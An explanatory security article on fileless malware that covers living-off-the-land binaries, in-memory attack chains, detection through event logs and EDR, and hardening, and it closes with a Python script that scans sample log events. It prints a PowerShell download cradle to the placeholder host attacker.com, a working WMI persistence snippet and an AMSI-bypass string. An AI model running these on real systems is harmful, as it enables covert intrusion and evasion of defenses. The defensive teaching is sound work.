Fileless malware runs primarily in memory and drives its actions through legitimate system tools, so the malicious payload is never, or only minimally, written to disk. Traditional antivirus is built around scanning files on disk, and that is precisely the layer fileless malware sidesteps. As signature-based file scanning improved, fileless techniques became increasingly common in sophisticated attacks, from nation-state APTs to ransomware gangs, and detecting them is one of the main reasons EDR (Endpoint Detection and Response) exists.
How Fileless Malware Works
The key insight: every modern operating system ships with powerful scripting and automation tools (on Windows: PowerShell, WMI, cmd.exe, rundll32.exe) that can execute code. If malware runs through these existing, Microsoft-signed tools instead of dropping its own executable, the only thing a file scanner sees is a trusted system binary.
Living off the Land (LotL)
Fileless attacks use “Living off the Land” binaries (LOLbins) — legitimate Windows tools with unexpected capabilities that attackers exploit:
| Binary | Legitimate Use | Attack Use |
|---|---|---|
| PowerShell | System automation | Execute encoded payloads, download shellcode |
| WMI (wmic.exe) | System management | Persistence, lateral movement, execution |
| Mshta.exe | HTML application host | Execute malicious HTA files |
| Regsvr32.exe | Register COM objects | Load a remote scriptlet (.sct) through scrobj.dll and run its embedded script |
| Certutil.exe | Certificate management | Download and decode files |
| Rundll32.exe | Run DLL functions | Execute code from an arbitrary DLL export, or script via the javascript: handler |
Typical Fileless Attack Chain
1. Initial delivery (the only disk-based component, often): A malicious Office macro, a phishing link, or a web exploit downloads a tiny loader — or triggers a PowerShell command directly.
2. PowerShell cradle: The initial access triggers a one-line PowerShell command:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc BASE64ENCODEDCOMMAND
The base64-encoded command downloads and executes additional PowerShell entirely in memory:
IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')
IEX (Invoke-Expression) executes the downloaded string as code — never written to disk.
3. In-memory execution: The payload runs entirely in PowerShell’s process memory. It may:
- Inject shellcode into legitimate processes (process injection)
- Load .NET assemblies from memory (not disk)
- Establish persistence via registry values or WMI event subscriptions (a small footprint in the registry or WMI repository, but no new file on disk)
- Communicate with C2 over HTTPS, which blends in with ordinary web traffic
4. Process injection: Malicious code is injected into legitimate processes (lsass.exe, svchost.exe, Explorer.exe) to further hide activity. From an AV perspective, the suspicious behavior appears to come from a trusted process.
Common Fileless Techniques
PowerShell-Based Execution
The most common vector. PowerShell can:
- Download payloads directly into memory
- Use reflection to load .NET assemblies without touching disk
- Encode commands to bypass basic keyword detection
- Disable AMSI (Antimalware Scan Interface) via patching
WMI Persistence
WMI subscriptions can trigger code execution on system events without any executable files:
# Simplified WMI persistence example: an event filter, a consumer, and the binding that ties them together (all three are required)
$Filter = Set-WmiInstance -Class __EventFilter -Namespace root\subscription -Arguments @{
    EventNamespace = 'root\cimv2'; Name = 'FilterName'; QueryLanguage = 'WQL'
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
}
# The consumer is what actually runs when the filter fires; here a hidden, encoded PowerShell command
$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace root\subscription -Arguments @{
    Name = 'ConsumerName'; CommandLineTemplate = 'powershell.exe -NoP -W Hidden -Enc BASE64ENCODEDCOMMAND'
}
# Binding the filter to the consumer activates the subscription
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace root\subscription -Arguments @{
    Filter = $Filter; Consumer = $Consumer
} | Out-Null
Once the filter is bound to a consumer, the subscription fires roughly every 60 seconds (the WITHIN clause is the polling interval) and survives reboots because it lives in the WMI repository rather than in any startup folder or Run key. A filter on its own does nothing, which is why hunting for this technique means enumerating __FilterToConsumerBinding instances in root\subscription, not just __EventFilter.
Registry Execution
Malicious code stored in the registry, executed via:
- A Run key (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) whose value is a PowerShell command that pulls the payload from another registry value and executes it in memory
- COM object hijacking: replacing registry entries for a COM object so that a legitimate process loads attacker-controlled code when it instantiates that object
Process Hollowing
A legitimate process (notepad.exe, calc.exe, or any other benign signed binary) is started in a suspended state, its in-memory image is unmapped and replaced with malicious code, and the main thread is resumed. The process's image path, signature and command line still point at the legitimate binary, so in the OS process list and to most AV tools it looks legitimate. The mismatch between the image on disk and what is actually mapped in memory is what memory-scanning EDR looks for.
Why Traditional AV Misses It
Traditional antivirus operates by:
- Scanning files on disk for known malicious signatures
- Heuristic analysis of file contents
- Checking file hashes against known bad databases
Fileless malware bypasses all three by having minimal or no disk presence. The malicious code lives in:
- Process memory (volatile — gone on reboot, unless persistence is established via registry/WMI)
- Legitimate system processes’ memory space
Detection Techniques
Behavioral EDR Monitoring
Modern EDR solutions (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint) detect fileless malware through behavior:
- PowerShell spawning from Office applications
- Encoded PowerShell commands (base64)
- AMSI bypass patterns in memory
- Unusual network connections from scripting processes
- Process memory anomalies and injection patterns
Event Log Analysis
Enable and monitor:
- Event ID 4104 (PowerShell Script Block Logging, in Microsoft-Windows-PowerShell/Operational): records the script blocks PowerShell compiles, after any -EncodedCommand blob has been decoded; when obfuscated code hands a deobfuscated string to Invoke-Expression, that inner block is logged too
- Event ID 4688 (Security, Process Creation): logs every new process; the command line is only included if the "Include command line in process creation events" audit setting is also enabled, and without it encoded PowerShell is invisible here
- Event ID 4103 (PowerShell Module Logging): logs pipeline execution details, including parameter values, for the modules it is enabled on
# Enable Script Block Logging (the policy key does not exist by default, so create it first)
New-Item -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Force | Out-Null
Set-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging -Name EnableScriptBlockLogging -Value 1 -Type DWord
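The following is an added example, not code from the original article or from any vendor product. It applies the detection ideas above to the attack chain described earlier: it decodes a powershell.exe -Enc argument exactly as PowerShell does (base64 of UTF-16LE text), then runs a few behavioral checks over constructed sample events shaped like a Security 4688 record and a PowerShell 4104 script block. The event field names, the regexes and the sample values are this example's own assumptions; the cradle string is the one shown in the attack chain. Python is used because this is SOC-side triage over exported logs rather than something typed into the endpoint.

```python
"""Triage of fileless-attack indicators in Windows event records.

Added example, not code from the original article or from any vendor product.
It runs over constructed sample events shaped like Security 4688 (process
creation with command line) and PowerShell 4104 (script block) records; the
field names, regexes and sample values are this example's own assumptions.
"""
import base64
import re
from pathlib import PureWindowsPath
from typing import Dict, List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, so "-e",
# "-ec", "-enc", ... "-encodedcommand" all introduce a base64 (UTF-16LE) blob.
_ENC_FLAGS = {"e", "ec"} | {"encodedcommand"[:n] for n in range(2, 15)}
_FLAG_ARG_RE = re.compile(r"(?<!\S)-(\w+)\s+([A-Za-z0-9+/=]+)")

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
CRADLE_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
DOWNLOAD_RE = re.compile(r"(?i)downloadstring|downloaddata|net\.webclient|invoke-webrequest|\biwr\b")
HIDDEN_RE = re.compile(r"(?i)(?<!\S)-w\w*\s+hidden")
AMSI_RE = re.compile(r"(?i)amsiutils|amsiinitfailed|amsiscanbuffer")


def encode_command(script: str) -> str:
    """Produce the blob powershell.exe -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload from a command line, or None."""
    for flag, blob in _FLAG_ARG_RE.findall(cmdline):
        if flag.lower() not in _ENC_FLAGS:
            continue  # -Exec Bypass, -File x.ps1 and similar are not encoded commands
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
    return None


# The download cradle from the article, as the attacker would encode it.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS: List[Dict] = [
    {   # Word launching a hidden, encoded PowerShell: the chain from the article
        "EventID": 4688,
        "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_command(CRADLE),
    },
    {   # A scheduled maintenance script: same binary, nothing suspicious
        "EventID": 4688,
        "ParentProcessName": r"C:\Windows\System32\svchost.exe",
        "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\Backup.ps1",
    },
    {   # Script block logging capturing the classic reflection-based AMSI bypass
        "EventID": 4104,
        "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
                           ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
    },
]


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def analyze_event(ev: Dict) -> List[str]:
    """Return the names of the indicators an event matches (empty list if clean)."""
    hits: List[str] = []
    if ev["EventID"] == 4688:
        cmd = ev["CommandLine"]
        if _basename(ev["ParentProcessName"]) in OFFICE_APPS and _basename(ev["NewProcessName"]) in SHELLS:
            hits.append("office_spawned_powershell")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.append("encoded_command")
        if HIDDEN_RE.search(cmd):
            hits.append("hidden_window")
        # Match cradle patterns against the decoded payload as well: the raw
        # command line only shows a base64 blob, which is exactly what -Enc is for.
        text = cmd + "\n" + (decoded or "")
    elif ev["EventID"] == 4104:
        text = ev["ScriptBlockText"]
    else:
        return hits
    if CRADLE_RE.search(text) and DOWNLOAD_RE.search(text):
        hits.append("download_cradle")
    if AMSI_RE.search(text):
        hits.append("amsi_bypass")
    return hits


def scan(events: List[Dict]) -> Dict[int, List[str]]:
    """Map event index -> indicator names for every event that triggered at least one."""
    result: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        names = analyze_event(ev)
        if names:
            result[i] = names
    return result


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(f"event {idx} (ID {SAMPLE_EVENTS[idx]['EventID']}): {', '.join(names)}")
```

Running it prints the indicators per event: the Office-spawned encoded command trips four checks, the scheduled backup script none, and the AMSI tampering is only visible in the 4104 record. That last point is the reason both logs matter: without the decode step (or without script block logging) the 4688 command line shows nothing but a base64 blob.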
AMSI (Antimalware Scan Interface)
Windows 10 and Windows Server 2016 and later include AMSI, which hands script content to the registered antimalware engine before it runs, even when that content exists only in memory. It covers PowerShell 5 and later, Windows Script Host (VBScript, JScript), Office VBA macros and, with .NET Framework 4.8, assemblies loaded from memory. AV vendors register as AMSI providers to scan content that never touches disk.
Attackers attempt to bypass AMSI either by using reflection to flip the internal state of PowerShell's AMSI integration so that scanning is skipped, or by patching the AmsiScanBuffer function in the amsi.dll loaded into their own process. Both leave traces: script blocks that reference the AMSI internals show up in 4104 logs (and AMSI itself flags the well-known bypass strings), and an EDR that checks amsi.dll code pages for modification catches the patch.
Defenses
Constrained Language Mode: Limit PowerShell to a safe subset (no arbitrary .NET method calls, no Add-Type, no COM objects), which breaks most reflective loaders and AMSI bypasses. The language mode of a session can be inspected or set with:
$ExecutionContext.SessionState.LanguageMode = 'ConstrainedLanguage'
Setting it this way only affects the current session and is undone by launching a fresh powershell.exe, so it is not a control on its own. To enforce it, deploy a WDAC policy or an AppLocker script policy in allow mode; PowerShell then drops into Constrained Language Mode automatically for any script the policy does not explicitly permit.
PowerShell Version 2 removal: PS v2 lacks AMSI and logging — attackers downgrade to it. Remove it:
Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root
AppLocker/WDAC: Allow only approved applications and scripts to execute. On its own an allowlist does not stop LOLbin abuse, because the LOLbins are Microsoft-signed and pass a default allow-Microsoft rule; pair it with Microsoft's recommended block rules (which cover mshta.exe and wmic.exe among others) and explicit deny rules for binaries your environment never needs.
Attack Surface Reduction (ASR) Rules: Microsoft Defender’s ASR rules block many fileless attack techniques (Office spawning PowerShell, obfuscated scripts, etc.).
Fileless malware demonstrates that perimeter and file-based defenses are insufficient alone. Behavioral monitoring, script logging, and EDR solutions that analyze memory and process behavior are now required components of a modern defensive stack.